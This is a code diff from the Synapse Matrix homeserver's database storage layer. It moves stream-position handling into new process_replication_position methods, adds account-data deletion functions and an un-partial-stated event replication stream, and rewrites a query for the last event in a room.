# The 'content != '{}' condition below prevents us from using
# `simple_select_list_txn` here, as it doesn't support conditions
# other than 'equals'.
sql = """
SELECT account_data_type, content FROM account_data
WHERE user_id = ?
"""
# If experimental MSC3391 support is enabled, then account data entries
# with an empty content are considered "deleted". So skip adding them to
# the results.
if self.hs.config.experimental.msc3391_enabled:
sql += " AND content != '{}'"
txn.execute(sql, (user_id,))
rows = self.db_pool.cursor_to_dict(txn)
global_account_data = {
row["account_data_type"]: db_to_json(row["content"]) for row in rows
}
rows = self.db_pool.simple_select_list_txn(
txn,
"room_account_data",
{"user_id": user_id},
["room_id", "account_data_type", "content"],
)
# The 'content != '{}' condition below prevents us from using
# `simple_select_list_txn` here, as it doesn't support conditions
# other than 'equals'.
sql = """
SELECT room_id, account_data_type, content FROM room_account_data
WHERE user_id = ?
"""
# If experimental MSC3391 support is enabled, then account data entries
# with an empty content are considered "deleted". So skip adding them to
# the results.
if self.hs.config.experimental.msc3391_enabled:
sql += " AND content != '{}'"
txn.execute(sql, (user_id,))
rows = self.db_pool.cursor_to_dict(txn)
by_room: Dict[str, Dict[str, JsonDict]] = {}
for row in rows:
room_data = by_room.setdefault(row["room_id"], {})
room_data[row["account_data_type"]] = db_to_json(row["content"])
return global_account_data, by_room
@ -411,10 +436,7 @@ class AccountDataWorkerStore(PushRulesWorkerStore, CacheInvalidationWorkerStore)
token: int,
rows: Iterable[Any],
) -> None:
if stream_name == TagAccountDataStream.NAME:
self._account_data_id_gen.advance(instance_name, token)
elif stream_name == AccountDataStream.NAME:
self._account_data_id_gen.advance(instance_name, token)
if stream_name == AccountDataStream.NAME:
for row in rows:
if not row.room_id:
self.get_global_account_data_by_type_for_user.invalidate(
@ -429,6 +451,15 @@ class AccountDataWorkerStore(PushRulesWorkerStore, CacheInvalidationWorkerStore)
super().process_replication_rows(stream_name, instance_name, token, rows)
def process_replication_position(
self, stream_name: str, instance_name: str, token: int
) -> None:
if stream_name == TagAccountDataStream.NAME:
self._account_data_id_gen.advance(instance_name, token)
elif stream_name == AccountDataStream.NAME:
self._account_data_id_gen.advance(instance_name, token)
super().process_replication_position(stream_name, instance_name, token)
async def add_account_data_to_room(
self, user_id: str, room_id: str, account_data_type: str, content: JsonDict
) -> int:
@ -469,6 +500,72 @@ class AccountDataWorkerStore(PushRulesWorkerStore, CacheInvalidationWorkerStore)
return self._account_data_id_gen.get_current_token()
async def remove_account_data_for_room(
self, user_id: str, room_id: str, account_data_type: str
) -> Optional[int]:
"""Delete the room account data for the user of a given type.
Args:
user_id: The user to remove account_data for.
room_id: The room ID to scope the request to.
account_data_type: The account data type to delete.
Returns:
The maximum stream position, or None if there was no matching room account
data to delete.
"""
assert self._can_write_to_account_data
assert isinstance(self._account_data_id_gen, AbstractStreamIdGenerator)
def _remove_account_data_for_room_txn(
txn: LoggingTransaction, next_id: int
) -> bool:
"""
Args:
txn: The transaction object.
next_id: The stream_id to update any existing rows to.
Returns:
True if an entry in room_account_data had its content set to '{}',
otherwise False. This informs callers of whether there actually was an
existing room account data entry to delete, or if the call was a no-op.
"""
# We can't use `simple_update` as it doesn't have the ability to specify
# where clauses other than '=', which we need for `content != '{}'` below.
sql = """
UPDATE room_account_data
SET stream_id = ?, content = '{}'
WHERE user_id = ?
AND room_id = ?
AND account_data_type = ?
AND content != '{}'
"""
txn.execute(
sql,
(next_id, user_id, room_id, account_data_type),
)
# Return true if any rows were updated.
return txn.rowcount != 0
async with self._account_data_id_gen.get_next() as next_id:
row_updated = await self.db_pool.runInteraction(
"remove_account_data_for_room",
_remove_account_data_for_room_txn,
next_id,
)
if not row_updated:
return None
self._account_data_stream_cache.entity_has_changed(user_id, next_id)
self.get_account_data_for_user.invalidate((user_id,))
self.get_account_data_for_room.invalidate((user_id, room_id))
self.get_account_data_for_room_and_type.prefill(
(user_id, room_id, account_data_type), {}
)
return self._account_data_id_gen.get_current_token()
async def add_account_data_for_user(
self, user_id: str, account_data_type: str, content: JsonDict
) -> int:
@ -569,6 +666,108 @@ class AccountDataWorkerStore(PushRulesWorkerStore, CacheInvalidationWorkerStore)
self._invalidate_cache_and_stream(txn, self.ignored_by, (ignored_user_id,))
self._invalidate_cache_and_stream(txn, self.ignored_users, (user_id,))
async def remove_account_data_for_user(
self,
user_id: str,
account_data_type: str,
) -> Optional[int]:
"""
Delete a single piece of user account data by type.
A "delete" is performed by updating a potentially existing row in the
"account_data" database table for (user_id, account_data_type) and
setting its content to "{}".
Args:
user_id: The user ID to modify the account data of.
account_data_type: The type to remove.
Returns:
The maximum stream position, or None if there was no matching account data
to delete.
"""
assert self._can_write_to_account_data
assert isinstance(self._account_data_id_gen, AbstractStreamIdGenerator)
def _remove_account_data_for_user_txn(
txn: LoggingTransaction, next_id: int
) -> bool:
"""
Args:
txn: The transaction object.
next_id: The stream_id to update any existing rows to.
Returns:
True if an entry in account_data had its content set to '{}', otherwise
False. This informs callers of whether there actually was an existing
account data entry to delete, or if the call was a no-op.
"""
# We can't use `simple_update` as it doesn't have the ability to specify
# where clauses other than '=', which we need for `content != '{}'` below.
sql = """
UPDATE account_data
SET stream_id = ?, content = '{}'
WHERE user_id = ?
AND account_data_type = ?
AND content != '{}'
"""
txn.execute(sql, (next_id, user_id, account_data_type))
if txn.rowcount == 0:
# We didn't update any rows. This means that there was no matching room
# account data entry to delete in the first place.
return False
# Ignored users get denormalized into a separate table as an optimisation.
if account_data_type == AccountDataTypes.IGNORED_USER_LIST:
# If this method was called with the ignored users account data type, we
# simply delete all ignored users.
# First pull all the users that this user ignores.
previously_ignored_users = set(
self.db_pool.simple_select_onecol_txn(
txn,
table="ignored_users",
keyvalues={"ignorer_user_id": user_id},
retcol="ignored_user_id",
)
)
# Then delete them from the database.
self.db_pool.simple_delete_txn(
txn,
table="ignored_users",
keyvalues={"ignorer_user_id": user_id},
)
# Invalidate the cache for ignored users which were removed.
for ignored_user_id in previously_ignored_users:
self._invalidate_cache_and_stream(
txn, self.ignored_by, (ignored_user_id,)
)
# Invalidate for this user the cache tracking ignored users.
self._invalidate_cache_and_stream(txn, self.ignored_users, (user_id,))
return True
async with self._account_data_id_gen.get_next() as next_id:
row_updated = await self.db_pool.runInteraction(
"remove_account_data_for_user",
_remove_account_data_for_user_txn,
next_id,
)
if not row_updated:
return None
self._account_data_stream_cache.entity_has_changed(user_id, next_id)
self.get_account_data_for_user.invalidate((user_id,))
self.get_global_account_data_by_type_for_user.prefill(
(user_id, account_data_type), {}
)
return self._account_data_id_gen.get_current_token()
async def purge_account_data_for_user(self, user_id: str) -> None:
"""
Removes ALL the account data for a user.

View File

@ -164,9 +164,6 @@ class CacheInvalidationWorkerStore(SQLBaseStore):
backfilled=True,
)
elif stream_name == CachesStream.NAME:
if self._cache_id_gen:
self._cache_id_gen.advance(instance_name, token)
for row in rows:
if row.cache_func == CURRENT_STATE_CACHE_NAME:
if row.keys is None:
@ -182,6 +179,14 @@ class CacheInvalidationWorkerStore(SQLBaseStore):
super().process_replication_rows(stream_name, instance_name, token, rows)
def process_replication_position(
self, stream_name: str, instance_name: str, token: int
) -> None:
if stream_name == CachesStream.NAME:
if self._cache_id_gen:
self._cache_id_gen.advance(instance_name, token)
super().process_replication_position(stream_name, instance_name, token)
def _process_event_stream_row(self, token: int, row: EventsStreamRow) -> None:
data = row.data

View File

@ -157,6 +157,13 @@ class DeviceInboxWorkerStore(SQLBaseStore):
)
return super().process_replication_rows(stream_name, instance_name, token, rows)
def process_replication_position(
self, stream_name: str, instance_name: str, token: int
) -> None:
if stream_name == ToDeviceStream.NAME:
self._device_inbox_id_gen.advance(instance_name, token)
super().process_replication_position(stream_name, instance_name, token)
def get_to_device_stream_token(self) -> int:
return self._device_inbox_id_gen.get_current_token()

View File

@ -54,7 +54,7 @@ from synapse.storage.util.id_generators import (
AbstractStreamIdTracker,
StreamIdGenerator,
)
from synapse.types import JsonDict, get_verify_key_from_cross_signing_key
from synapse.types import JsonDict, StrCollection, get_verify_key_from_cross_signing_key
from synapse.util import json_decoder, json_encoder
from synapse.util.caches.descriptors import cached, cachedList
from synapse.util.caches.lrucache import LruCache
@ -162,14 +162,21 @@ class DeviceWorkerStore(RoomMemberWorkerStore, EndToEndKeyWorkerStore):
self, stream_name: str, instance_name: str, token: int, rows: Iterable[Any]
) -> None:
if stream_name == DeviceListsStream.NAME:
self._device_list_id_gen.advance(instance_name, token)
self._invalidate_caches_for_devices(token, rows)
elif stream_name == UserSignatureStream.NAME:
self._device_list_id_gen.advance(instance_name, token)
for row in rows:
self._user_signature_stream_cache.entity_has_changed(row.user_id, token)
return super().process_replication_rows(stream_name, instance_name, token, rows)
def process_replication_position(
self, stream_name: str, instance_name: str, token: int
) -> None:
if stream_name == DeviceListsStream.NAME:
self._device_list_id_gen.advance(instance_name, token)
elif stream_name == UserSignatureStream.NAME:
self._device_list_id_gen.advance(instance_name, token)
super().process_replication_position(stream_name, instance_name, token)
def _invalidate_caches_for_devices(
self, token: int, rows: Iterable[DeviceListsStream.DeviceListsStreamRow]
) -> None:
@ -1062,16 +1069,30 @@ class DeviceWorkerStore(RoomMemberWorkerStore, EndToEndKeyWorkerStore):
return {row["user_id"] for row in rows}
async def mark_remote_user_device_cache_as_stale(self, user_id: str) -> None:
async def mark_remote_users_device_caches_as_stale(
self, user_ids: StrCollection
) -> None:
"""Records that the server has reason to believe the cache of the devices
for the remote users is out of date.
"""
await self.db_pool.simple_upsert(
table="device_lists_remote_resync",
keyvalues={"user_id": user_id},
values={},
insertion_values={"added_ts": self._clock.time_msec()},
desc="mark_remote_user_device_cache_as_stale",
def _mark_remote_users_device_caches_as_stale_txn(
txn: LoggingTransaction,
) -> None:
# TODO add insertion_values support to simple_upsert_many and use
# that!
for user_id in user_ids:
self.db_pool.simple_upsert_txn(
txn,
table="device_lists_remote_resync",
keyvalues={"user_id": user_id},
values={},
insertion_values={"added_ts": self._clock.time_msec()},
)
await self.db_pool.runInteraction(
"mark_remote_users_device_caches_as_stale",
_mark_remote_users_device_caches_as_stale_txn,
)
async def mark_remote_user_device_cache_as_valid(self, user_id: str) -> None:

View File

@ -274,15 +274,6 @@ class EventPushActionsWorkerStore(ReceiptsWorkerStore, StreamWorkerStore, SQLBas
self._clear_old_push_actions_staging, 30 * 60 * 1000
)
self.db_pool.updates.register_background_index_update(
"event_push_summary_unique_index",
index_name="event_push_summary_unique_index",
table="event_push_summary",
columns=["user_id", "room_id"],
unique=True,
replaces_index="event_push_summary_user_rm",
)
self.db_pool.updates.register_background_index_update(
"event_push_summary_unique_index2",
index_name="event_push_summary_unique_index2",


@ -59,8 +59,9 @@ from synapse.metrics.background_process_metrics import (
run_as_background_process,
wrap_as_background_process,
)
from synapse.replication.tcp.streams import BackfillStream
from synapse.replication.tcp.streams import BackfillStream, UnPartialStatedEventStream
from synapse.replication.tcp.streams.events import EventsStream
from synapse.replication.tcp.streams.partial_state import UnPartialStatedEventStreamRow
from synapse.storage._base import SQLBaseStore, db_to_json, make_in_list_sql_clause
from synapse.storage.database import (
DatabasePool,
@ -70,6 +71,7 @@ from synapse.storage.database import (
from synapse.storage.engines import PostgresEngine
from synapse.storage.types import Cursor
from synapse.storage.util.id_generators import (
AbstractStreamIdGenerator,
AbstractStreamIdTracker,
MultiWriterIdGenerator,
StreamIdGenerator,
@ -292,19 +294,121 @@ class EventsWorkerStore(SQLBaseStore):
id_column="chain_id",
)
self._un_partial_stated_events_stream_id_gen: AbstractStreamIdGenerator
if isinstance(database.engine, PostgresEngine):
self._un_partial_stated_events_stream_id_gen = MultiWriterIdGenerator(
db_conn=db_conn,
db=database,
stream_name="un_partial_stated_event_stream",
instance_name=hs.get_instance_name(),
tables=[
("un_partial_stated_event_stream", "instance_name", "stream_id")
],
sequence_name="un_partial_stated_event_stream_sequence",
# TODO(faster_joins, multiple writers) Support multiple writers.
writers=["master"],
)
else:
self._un_partial_stated_events_stream_id_gen = StreamIdGenerator(
db_conn, "un_partial_stated_event_stream", "stream_id"
)
def get_un_partial_stated_events_token(self) -> int:
# TODO(faster_joins, multiple writers): This is inappropriate if there are multiple
# writers because workers that don't write often will hold all
# readers up.
return self._un_partial_stated_events_stream_id_gen.get_current_token()
async def get_un_partial_stated_events_from_stream(
self, instance_name: str, last_id: int, current_id: int, limit: int
) -> Tuple[List[Tuple[int, Tuple[str, bool]]], int, bool]:
"""Get updates for the un-partial-stated events replication stream.
Args:
instance_name: The writer we want to fetch updates from. Unused
here since there is only ever one writer.
last_id: The token to fetch updates from. Exclusive.
current_id: The token to fetch updates up to. Inclusive.
limit: The requested limit for the number of rows to return. The
function may return more or fewer rows.
Returns:
A tuple consisting of: the updates, a token to use to fetch
subsequent updates, and whether we returned fewer rows than exist
between the requested tokens due to the limit.
The token returned can be used in a subsequent call to this
function to get further updates.
The updates are a list of 2-tuples of stream ID and the row data.
"""
if last_id == current_id:
return [], current_id, False
def get_un_partial_stated_events_from_stream_txn(
txn: LoggingTransaction,
) -> Tuple[List[Tuple[int, Tuple[str, bool]]], int, bool]:
sql = """
SELECT stream_id, event_id, rejection_status_changed
FROM un_partial_stated_event_stream
WHERE ? < stream_id AND stream_id <= ? AND instance_name = ?
ORDER BY stream_id ASC
LIMIT ?
"""
txn.execute(sql, (last_id, current_id, instance_name, limit))
updates = [
(
row[0],
(
row[1],
bool(row[2]),
),
)
for row in txn
]
limited = False
upto_token = current_id
if len(updates) >= limit:
upto_token = updates[-1][0]
limited = True
return updates, upto_token, limited
return await self.db_pool.runInteraction(
"get_un_partial_stated_events_from_stream",
get_un_partial_stated_events_from_stream_txn,
)
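That helper follows the contract in its docstring: exclusive lower bound, inclusive upper bound, and a limited flag when the limit is hit. A hypothetical consumer loop for any helper with this contract (fetch stands in for get_un_partial_stated_events_from_stream):

    from typing import Any, Awaitable, Callable, List, Tuple

    Fetch = Callable[[str, int, int, int], Awaitable[Tuple[List[Any], int, bool]]]

    async def drain(fetch: Fetch, instance_name: str, last_id: int, current_id: int) -> List[Any]:
        updates: List[Any] = []
        while True:
            batch, upto_token, limited = await fetch(instance_name, last_id, current_id, 100)
            updates.extend(batch)
            if not limited:
                return updates
            # When limited, upto_token is the stream ID of the last row
            # returned; resume from it (the lower bound is exclusive).
            last_id = upto_token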
def process_replication_rows(
self,
stream_name: str,
instance_name: str,
token: int,
rows: Iterable[Any],
) -> None:
if stream_name == UnPartialStatedEventStream.NAME:
for row in rows:
assert isinstance(row, UnPartialStatedEventStreamRow)
self.is_partial_state_event.invalidate((row.event_id,))
if row.rejection_status_changed:
# If the partial-stated event became rejected or unrejected
# when it wasn't before, we need to invalidate this cache.
self._invalidate_local_get_event_cache(row.event_id)
super().process_replication_rows(stream_name, instance_name, token, rows)
def process_replication_position(
self, stream_name: str, instance_name: str, token: int
) -> None:
if stream_name == EventsStream.NAME:
self._stream_id_gen.advance(instance_name, token)
elif stream_name == BackfillStream.NAME:
self._backfill_id_gen.advance(instance_name, -token)
super().process_replication_rows(stream_name, instance_name, token, rows)
super().process_replication_position(stream_name, instance_name, token)
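One subtlety above: backfilled events live at negative stream orderings, while the backfill stream's replication tokens travel as positive integers, so the sign is restored before advancing the tracker, hence advance(instance_name, -token). In miniature (an assumption drawn from the negation in the hunk, not from separate documentation):

    def backfill_position_to_stream_ordering(token: int) -> int:
        # The backfill stream token is the negation of the (negative)
        # stream ordering; flip it back before comparing or advancing.
        return -token

    assert backfill_position_to_stream_ordering(17) == -17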
async def have_censored_event(self, event_id: str) -> bool:
"""Check if an event has been censored, i.e. if the content of the event has been erased
@ -2292,6 +2396,9 @@ class EventsWorkerStore(SQLBaseStore):
This can happen, for example, when resyncing state during a faster join.
It is the caller's responsibility to ensure that other workers are
sent a notification so that they call `_invalidate_local_get_event_cache()`.
Args:
txn:
event_id: ID of event to update
@ -2330,14 +2437,3 @@ class EventsWorkerStore(SQLBaseStore):
)
self.invalidate_get_event_cache_after_txn(txn, event_id)
# TODO(faster_joins): invalidate the cache on workers. Ideally we'd just
# call '_send_invalidation_to_replication', but we actually need the other
# end to call _invalidate_local_get_event_cache() rather than (just)
# _get_event_cache.invalidate().
#
# One solution might be to (somehow) get the workers to call
# _invalidate_caches_for_event() (though that will invalidate more than
# strictly necessary).
#
# https://github.com/matrix-org/synapse/issues/12994


@ -439,8 +439,14 @@ class PresenceStore(PresenceBackgroundUpdateStore, CacheInvalidationWorkerStore)
rows: Iterable[Any],
) -> None:
if stream_name == PresenceStream.NAME:
self._presence_id_gen.advance(instance_name, token)
for row in rows:
self.presence_stream_cache.entity_has_changed(row.user_id, token)
self._get_presence_for_user.invalidate((row.user_id,))
return super().process_replication_rows(stream_name, instance_name, token, rows)
def process_replication_position(
self, stream_name: str, instance_name: str, token: int
) -> None:
if stream_name == PresenceStream.NAME:
self._presence_id_gen.advance(instance_name, token)
super().process_replication_position(stream_name, instance_name, token)


@ -154,6 +154,13 @@ class PushRulesWorkerStore(
self.push_rules_stream_cache.entity_has_changed(row.user_id, token)
return super().process_replication_rows(stream_name, instance_name, token, rows)
def process_replication_position(
self, stream_name: str, instance_name: str, token: int
) -> None:
if stream_name == PushRulesStream.NAME:
self._push_rules_stream_id_gen.advance(instance_name, token)
super().process_replication_position(stream_name, instance_name, token)
@cached(max_entries=5000)
async def get_push_rules_for_user(self, user_id: str) -> FilteredPushRules:
rows = await self.db_pool.simple_select_list(


@ -111,12 +111,12 @@ class PusherWorkerStore(SQLBaseStore):
def get_pushers_stream_token(self) -> int:
return self._pushers_id_gen.get_current_token()
def process_replication_rows(
self, stream_name: str, instance_name: str, token: int, rows: Iterable[Any]
def process_replication_position(
self, stream_name: str, instance_name: str, token: int
) -> None:
if stream_name == PushersStream.NAME:
self._pushers_id_gen.advance(instance_name, token)
return super().process_replication_rows(stream_name, instance_name, token, rows)
super().process_replication_position(stream_name, instance_name, token)
async def get_pushers_by_app_id_and_pushkey(
self, app_id: str, pushkey: str


@ -588,6 +588,13 @@ class ReceiptsWorkerStore(SQLBaseStore):
return super().process_replication_rows(stream_name, instance_name, token, rows)
def process_replication_position(
self, stream_name: str, instance_name: str, token: int
) -> None:
if stream_name == ReceiptsStream.NAME:
self._receipts_id_gen.advance(instance_name, token)
super().process_replication_position(stream_name, instance_name, token)
def _insert_linearized_receipt_txn(
self,
txn: LoggingTransaction,


@ -14,7 +14,7 @@
# limitations under the License.
import collections.abc
import logging
from typing import TYPE_CHECKING, Collection, Dict, Iterable, Optional, Set, Tuple
from typing import TYPE_CHECKING, Any, Collection, Dict, Iterable, Optional, Set, Tuple
import attr
@ -24,6 +24,8 @@ from synapse.api.room_versions import KNOWN_ROOM_VERSIONS, RoomVersion
from synapse.events import EventBase
from synapse.events.snapshot import EventContext
from synapse.logging.opentracing import trace
from synapse.replication.tcp.streams import UnPartialStatedEventStream
from synapse.replication.tcp.streams.partial_state import UnPartialStatedEventStreamRow
from synapse.storage._base import SQLBaseStore
from synapse.storage.database import (
DatabasePool,
@ -80,6 +82,21 @@ class StateGroupWorkerStore(EventsWorkerStore, SQLBaseStore):
hs: "HomeServer",
):
super().__init__(database, db_conn, hs)
self._instance_name: str = hs.get_instance_name()
def process_replication_rows(
self,
stream_name: str,
instance_name: str,
token: int,
rows: Iterable[Any],
) -> None:
if stream_name == UnPartialStatedEventStream.NAME:
for row in rows:
assert isinstance(row, UnPartialStatedEventStreamRow)
self._get_state_group_for_event.invalidate((row.event_id,))
super().process_replication_rows(stream_name, instance_name, token, rows)
async def get_room_version(self, room_id: str) -> RoomVersion:
"""Get the room_version of a given room
@ -404,18 +421,21 @@ class StateGroupWorkerStore(EventsWorkerStore, SQLBaseStore):
context: EventContext,
) -> None:
"""Update the state group for a partial state event"""
await self.db_pool.runInteraction(
"update_state_for_partial_state_event",
self._update_state_for_partial_state_event_txn,
event,
context,
)
async with self._un_partial_stated_events_stream_id_gen.get_next() as un_partial_state_event_stream_id:
await self.db_pool.runInteraction(
"update_state_for_partial_state_event",
self._update_state_for_partial_state_event_txn,
event,
context,
un_partial_state_event_stream_id,
)
def _update_state_for_partial_state_event_txn(
self,
txn: LoggingTransaction,
event: EventBase,
context: EventContext,
un_partial_state_event_stream_id: int,
) -> None:
# we shouldn't have any outliers here
assert not event.internal_metadata.is_outlier()
@ -436,7 +456,10 @@ class StateGroupWorkerStore(EventsWorkerStore, SQLBaseStore):
# the event may now be rejected where it was not before, or vice versa,
# in which case we need to update the rejected flags.
if bool(context.rejected) != (event.rejected_reason is not None):
rejection_status_changed = bool(context.rejected) != (
event.rejected_reason is not None
)
if rejection_status_changed:
self.mark_event_rejected_txn(txn, event.event_id, context.rejected)
self.db_pool.simple_delete_one_txn(
@ -445,8 +468,6 @@ class StateGroupWorkerStore(EventsWorkerStore, SQLBaseStore):
keyvalues={"event_id": event.event_id},
)
# TODO(faster_joins): need to do something about workers here
# https://github.com/matrix-org/synapse/issues/12994
txn.call_after(self.is_partial_state_event.invalidate, (event.event_id,))
txn.call_after(
self._get_state_group_for_event.prefill,
@ -454,6 +475,17 @@ class StateGroupWorkerStore(EventsWorkerStore, SQLBaseStore):
state_group,
)
self.db_pool.simple_insert_txn(
txn,
"un_partial_stated_event_stream",
{
"stream_id": un_partial_state_event_stream_id,
"instance_name": self._instance_name,
"event_id": event.event_id,
"rejection_status_changed": rejection_status_changed,
},
)
class MainStateBackgroundUpdateStore(RoomMemberWorkerStore):
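Together with the process_replication_rows additions earlier in this diff (in EventsWorkerStore and StateGroupWorkerStore), the simple_insert_txn above completes the stream's round trip: the writer records each un-partial-stated event under a fresh stream ID, and every worker invalidates its local caches when the row reaches it. A toy in-memory rendering of that flow (names and structure are illustrative, not Synapse's):

    from dataclasses import dataclass
    from itertools import count
    from typing import Dict, List, Set

    @dataclass
    class Row:
        stream_id: int
        event_id: str
        rejection_status_changed: bool

    _ids = count(1)
    _stream: List[Row] = []

    def write_row(event_id: str, rejection_status_changed: bool) -> None:
        # Writer side: mirrors the simple_insert_txn above.
        _stream.append(Row(next(_ids), event_id, rejection_status_changed))

    def on_replicated(row: Row, caches: Dict[str, Set[str]]) -> None:
        # Worker side: mirrors the process_replication_rows handlers.
        caches["is_partial_state_event"].discard(row.event_id)
        if row.rejection_status_changed:
            caches["get_event"].discard(row.event_id)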


@ -801,13 +801,66 @@ class StreamWorkerStore(EventsWorkerStore, SQLBaseStore):
before this stream ordering.
"""
last_row = await self.get_room_event_before_stream_ordering(
room_id=room_id,
stream_ordering=end_token.stream,
def get_last_event_in_room_before_stream_ordering_txn(
txn: LoggingTransaction,
) -> Optional[str]:
# We need to handle the fact that the stream tokens can be vector
# clocks. We do this by getting all rows between the minimum and
# maximum stream ordering in the token, plus one row less than the
# minimum stream ordering. We then filter the results against the
# token and return the first row that matches.
sql = """
SELECT * FROM (
SELECT instance_name, stream_ordering, topological_ordering, event_id
FROM events
LEFT JOIN rejections USING (event_id)
WHERE room_id = ?
AND ? < stream_ordering AND stream_ordering <= ?
AND NOT outlier
AND rejections.event_id IS NULL
ORDER BY stream_ordering DESC
) AS a
UNION
SELECT * FROM (
SELECT instance_name, stream_ordering, topological_ordering, event_id
FROM events
LEFT JOIN rejections USING (event_id)
WHERE room_id = ?
AND stream_ordering <= ?
AND NOT outlier
AND rejections.event_id IS NULL
ORDER BY stream_ordering DESC
LIMIT 1
) AS b
"""
txn.execute(
sql,
(
room_id,
end_token.stream,
end_token.get_max_stream_pos(),
room_id,
end_token.stream,
),
)
for instance_name, stream_ordering, topological_ordering, event_id in txn:
if _filter_results(
lower_token=None,
upper_token=end_token,
instance_name=instance_name,
topological_ordering=topological_ordering,
stream_ordering=stream_ordering,
):
return event_id
return None
return await self.db_pool.runInteraction(
"get_last_event_in_room_before_stream_ordering",
get_last_event_in_room_before_stream_ordering_txn,
)
if last_row:
return last_row[2]
return None
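The filtering step the comment above alludes to is _filter_results, which understands that a RoomStreamToken can be a vector clock carrying one position per event writer; the UNION's second branch guarantees at least one candidate strictly below the window in case nothing inside it passes the filter. A toy version of the upper-bound check (illustrative; Synapse's real token and filter handle more cases):

    from dataclasses import dataclass, field
    from typing import Dict

    @dataclass
    class ToyToken:
        stream: int  # minimum position across all writers
        instance_map: Dict[str, int] = field(default_factory=dict)

        def get_max_stream_pos(self) -> int:
            return max(self.instance_map.values(), default=self.stream)

    def row_is_before(token: ToyToken, instance_name: str, stream_ordering: int) -> bool:
        # A writer absent from the map is only covered up to token.stream.
        return stream_ordering <= token.instance_map.get(instance_name, token.stream)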
async def get_current_room_stream_token_for_room_id(
self, room_id: str


@ -300,13 +300,19 @@ class TagsWorkerStore(AccountDataWorkerStore):
rows: Iterable[Any],
) -> None:
if stream_name == TagAccountDataStream.NAME:
self._account_data_id_gen.advance(instance_name, token)
for row in rows:
self.get_tags_for_user.invalidate((row.user_id,))
self._account_data_stream_cache.entity_has_changed(row.user_id, token)
super().process_replication_rows(stream_name, instance_name, token, rows)
def process_replication_position(
self, stream_name: str, instance_name: str, token: int
) -> None:
if stream_name == TagAccountDataStream.NAME:
self._account_data_id_gen.advance(instance_name, token)
super().process_replication_position(stream_name, instance_name, token)
class TagsStore(TagsWorkerStore):
pass
